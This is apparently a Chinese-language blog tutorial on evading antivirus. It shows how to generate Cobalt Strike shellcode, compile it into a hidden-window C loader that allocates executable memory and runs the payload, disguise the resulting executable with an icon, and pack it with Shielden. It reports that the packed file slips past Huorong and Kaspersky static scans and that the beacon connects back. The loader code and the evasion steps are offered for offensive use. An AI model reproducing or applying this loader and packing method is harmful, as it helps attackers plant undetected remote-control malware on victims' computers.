C编译shellcode+shielden加壳免杀火绒、卡巴斯基

CS 生成 shellcode

在Payload Generator处选择veil,生成shellcode

imgbed.cn图床

生成shellcode

imgbed.cn图床

使用Visual Studio 2017编译shellcode

复制shellcode到以下代码中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
// MSF.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
#include <iostream>
#include "stdio.h"
#include "Windows.h"
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")                        //去除窗口
//步骤b所在桌面产生的 shellcode.c的内容;
unsigned char shellcode[] = "";

void main()
{
	//ShellExecute(NULL, _T("open"), _T("explorer.exe"), _T("https://www.baiud.com"), NULL, SW_SHOW);
	LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	memcpy(Memory, shellcode, sizeof(shellcode));
	((void(*)())Memory)();
}

在Visual Studio中新建控制台应用程序并复制代码

imgbed.cn图床

按如图设置编译选项

imgbed.cn图床

选择重新生成解决方案,生成ConsoleApplication4.exe

imgbed.cn图床

使用用Restorator 2018为生成的exe文件添加图标

将ConsoleApplication4.exe拖入Restorator 2018,右键选择添加资源,名称可随意填写

imgbed.cn图床

将ico文件拖入Restorator 2018并保存

imgbed.cn图床

运用shielden为exe文件加壳

设置如下

imgbed.cn图床

免杀效果

virustotal.com上 shellcode_launcher.exe 查杀率为17/71

imgbed.cn图床

本地测试,静态扫描火绒与卡巴斯基均不查杀

imgbed.cn图床

cs上线

imgbed.cn图床

参考链接

使用 C 编译 shellcode 免杀上线

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!